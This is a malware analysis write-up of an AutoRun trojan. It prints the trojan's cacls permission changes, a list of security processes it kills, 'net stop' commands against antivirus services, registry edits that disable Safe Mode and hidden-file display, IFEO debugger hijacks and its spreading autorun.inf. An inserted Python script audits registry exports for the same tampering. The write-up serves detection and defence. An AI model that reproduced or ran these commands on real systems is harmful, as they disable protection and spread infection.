Win32.Troj.AutoRun.98304【explorer.exe, autorun.inf】
Written in: Borland Delphi 6.0 - 7.0
1. Creates a mutex named "system" so that only one instance of the process can run.
2. Carries its own sssurl.dll and overwrites the system file urlmon.dll with it. Is it afraid that this file has been deleted for some reason? (Verified afterwards: sssurl.dll is urlmon.dll.)
3. Takes ownership of packet.dll, pthreadVC.dll, wpcap.dll, npf.sys and the other files below (granting Everyone full control with cacls) in preparation for later activity; it will presumably download rogue software and ARP viruses. It also launches itself through the Startup folder.
cacls C:\windows\system32\packet.dll /e /p everyone:f
cacls C:\windows\system32\pthreadVC.dll /e /p everyone:f
cacls C:\windows\system32\wpcap.dll /e /p everyone:f
cacls C:\windows\system32\drivers\npf.sys /e /p everyone:f
cacls C:\windows\system32\npptools.dll /e /p everyone:f
cacls C:\windows\system32\drivers\acpidisk.sys /e /p everyone:f
cacls C:\windows\system32\wanpacket.dll /e /p everyone:f
cacls C:\Documents and Settings\All Users\「开始」菜单\程序\启动 /e /p everyone:f
4. Then it boosts its own fighting power: it obtains the debug privilege, enumerates all processes, and kills any whose name matches the list below. Since it terminates the processes of several ARP firewalls, the downloaded viruses presumably include an ARP virus.
360Safe.exe
360tray.exe
VsTskMgr.exe
UpdaterUI.exe
runiep.exe
TBMon.exe
KASARP.exe
scan32.exe
VPC32.exe
VPTRAY.exe
ANTIARP.exe
KRegEx.exe
KvXP.kxp
kvsrvxp.kxp
kvsrvxp.exe
KVWSC.EXE
Iparmor.exe
AST.EXE
5. Every 200 ms it runs net stop commands to shut down security software services
net stop KPfwSvc
net stop KWhatchsvc
net stop McShield
net stop Norton AntiVirus Server
6. Modifies the registry to break Safe Mode and the display of hidden files
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
CheckedValue = 0x000006B8
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
(Default) = "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
(Default) = "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
(Default) = "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
(Default) = "DiskDrive"
7. Image hijacking (Image File Execution Options) of Kingsoft, ARP firewalls and other security tools
360rpt.EXE
360safe.EXE
360tray.EXE
ANTIARP.exe
Ast.EXE
AutoRunKiller.exe
AvMonitor.EXE
AVP.EXE
CCenter.EXE
Frameworkservice.EXE
IceSword.EXE
Iparmor.EXE
KASARP.exe
KRegEx.EXE
KVMonxp.kxp
KVSrvXP.EXE
KVWSC.EXE
Mmsk.EXE
Navapsvc.EXE
Nod32kui.EXE
QQDOCTOR.EXE
Regedit.EXE
VPC32.exe
VPTRAY.exe
WOPTILITIES.EXE
Wuauclt.EXE
~.EXE
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.EXE]
Debugger = "%Systemroot%\system32\wuauc1t.exe"
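As an added example (not part of the original analysis): a Python audit that reads a `reg export` file offline and flags the three changes from steps 6 and 7, an IFEO Debugger value that does not point at a known debugger, a SHOWALL CheckedValue other than 1, and a SafeBoot Minimal/Network list missing the DiskDrive class entry. The .reg text, the debugger allow-list and the function names are constructed here, not taken from the sample.

```python
import re
# Registry locations from the write-up; ALLOWED_DEBUGGERS is an assumed site allow-list.
IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
SHOWALL = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
DISK_CLASS = "{4D36E967-E325-11CE-BFC1-08002BE10318}"  # DiskDrive class GUID under SafeBoot
SAFEBOOT = re.compile(r"^HKEY_LOCAL_MACHINE\\SYSTEM\\(?:CurrentControlSet|ControlSet\d+)\\Control\\SafeBoot\\(Minimal|Network)$", re.I)
ALLOWED_DEBUGGERS = ("vsjitdebugger.exe", "windbg.exe", "ntsd.exe")
# Constructed .reg text mirroring the tampering described in steps 6 and 7 (not a real export).
SAMPLE = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.EXE]
"Debugger"="%Systemroot%\\system32\\wuauc1t.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:000006b8
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network]
"""

def parse_reg_export(text):
    """Return {key: {name: value}}; dword values become int, strings are unescaped."""
    keys, cur = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1]
            keys[cur] = {}
        elif cur is not None and (line.startswith('"') or line.startswith("@=")):
            name, _, val = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            keys[cur][name] = (int(val[6:], 16) if val.lower().startswith("dword:")
                               else val.strip('"').replace("\\\\", "\\"))
    return keys

def audit(keys):
    """Return (finding, subject, value) tuples for the three tampering patterns."""
    findings, lower = [], {k.lower(): v for k, v in keys.items()}
    for key, vals in keys.items():
        if key.lower().startswith(IFEO.lower() + "\\") and "Debugger" in vals:
            exe = vals["Debugger"].lower().strip('"').split("\\")[-1]  # basename of the debugger
            if not exe.startswith(ALLOWED_DEBUGGERS):
                findings.append(("ifeo_hijack", key.rsplit("\\", 1)[1], vals["Debugger"]))
        m = SAFEBOOT.match(key)  # each SafeBoot list must still carry the DiskDrive class entry
        if m and (key + "\\" + DISK_CLASS).lower() not in lower:
            findings.append(("safeboot_missing", m.group(1), DISK_CLASS))
    showall = lower.get(SHOWALL.lower())
    if showall is not None and showall.get("CheckedValue") != 1:  # 1 means "show hidden files"
        findings.append(("showall_tampered", "CheckedValue", showall.get("CheckedValue")))
    return findings
```

Run it against `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg` (and the corresponding SafeBoot and SHOWALL exports) instead of SAMPLE on a machine under investigation.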
8. Copies autorun.inf and explorer.exe to the root directory of each partition
[autorun]
shell\open=打开(&O)
shell\open\Command=explorer.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\command=explorer.exe
9. Downloads the following files in the background, saves them one by one as system.pif and win1.pif through win20.pif, and runs them in turn.
On my end, the links that could still be downloaded were:
The following links were already dead: